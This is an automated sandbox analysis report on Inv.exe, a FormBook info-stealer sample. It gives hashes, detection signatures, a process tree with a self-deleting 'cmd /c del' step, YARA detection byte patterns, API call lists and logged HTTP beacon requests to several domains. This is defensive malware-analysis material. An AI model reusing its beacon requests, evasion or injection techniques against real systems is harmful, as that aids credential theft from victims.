Analysis Report Inv.exe

Overview

General Information

Sample Name: Inv.exe
Analysis ID: 339347
MD5: a3aba7d40da6c8c86e4e8d035803f314
SHA1: 469b36f05939d6ec6457f1b72ba9f6c7a960be06
SHA256: 1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Inv.exe (PID: 1848 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
    • Inv.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 6460 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6740 cmdline: /c del 'C:\Users\user\Desktop\Inv.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.Inv.exe.d90000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Inv.exe.d90000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Inv.exe.d90000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0.2.Inv.exe.d90000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Inv.exe.d90000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Inv.exe, Avira: detected
Found malware configuration
Source: 0.2.Inv.exe.d90000.1.unpack, Malware Configuration Extractor: FormBook
Multi AV Scanner detection for submitted file
Source: Inv.exe, Virustotal: Detection: 39%
Source: Inv.exe, ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match, File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Inv.exe, Joe Sandbox ML: detected
Source: 0.2.Inv.exe.d90000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Inv.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: Inv.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Inv.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Inv.exe, Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\Inv.exe, Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\Inv.exe, Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Inv.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi

Networking:

Uses netstat to query active network connections and open ports
Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic, HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1 | Host: www.millcityloam.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1 | Host: www.achonabu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1 | Host: www.a-zsolutionsllc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1 | Host: www.nationshiphop.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 198.54.117.217
Source: Joe Sandbox View, ASN Name: GOOGLEUS
Source: Joe Sandbox View, ASN Name: SINGLEHOP-LLCUS
Source: unknown, DNS traffic detected: queries for: www.millcityloam.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | X-Powered-By: PHP/5.6.40 | Content-Type: text/html; charset=UTF-8 | X-UA-Compatible: IE=edge | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/" | X-LiteSpeed-Cache-Control: public,max-age=3600 | X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_ | X-Litespeed-Cache: miss | Transfer-Encoding: chunked | Date: Wed, 13 Jan 2021 20:27:17 GMT | Server: LiteSpeed | Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><he
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: Inv.exe, 00000000.00000002.673645409.0000000000A58000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041A08A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00419FDA NtReadFile,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00419FDC NtReadFile,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019898F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019895D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019897A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019899D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019898A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0198B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0198A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019895F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0198AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989560 NtWriteFile,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0198A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0198A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019896D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01989610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E595D0 NtClose,LdrInitializeThunk,
